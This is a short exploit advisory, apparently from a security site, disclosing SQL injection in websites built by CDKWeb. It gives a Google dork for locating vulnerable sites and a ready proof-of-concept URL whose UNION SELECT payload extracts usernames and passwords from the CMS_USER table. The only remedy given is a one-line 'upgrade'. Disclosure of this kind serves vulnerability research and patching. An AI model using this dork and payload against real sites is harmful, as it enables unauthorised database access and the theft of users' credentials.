CDKWeb SQL Injection

2014.02.11
Credit: Th3 R0cksT3r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:.php?id= intext:Website Design and Web Development by

==== Exploit Author:Th3 R0cksT3r ==== # Exploit Title: CDKWeb SQL injection # Date: 06.02.2014 # Email: th3rockst3r@gmail.com # Vendor Homepage: http://www.cdkweb.com/ # Facebook: Facebook.com/thee.rocksTer # Google Dork: inurl:.php?id= intext:Website Design and Web Development by CDKWeb # Risk: High === Description* ===* An attacker can get database info by this vulnerablity. Proof Of Concept: http://www.site.com/pressReleaseDetails.php?id=-136/%27+UNION+SELECT+1,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8+from+CMS_USER--+ ===Solution=== Upgrade to latest version. # Greetz:Back Bone,Demon,Orions Hunter,Dark Knight Sparda,Gh0st KilL3r,Luge,Code Breaker,Darklord,Devil Prince,Rakhal Beduin,Bakeer Bhai,R007 C0D3,Dipto,8l@ck 3xplor3r, Sparrow,Bd Matrix,Cyber Blader,Batchfweak and BD BLACK HAT


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top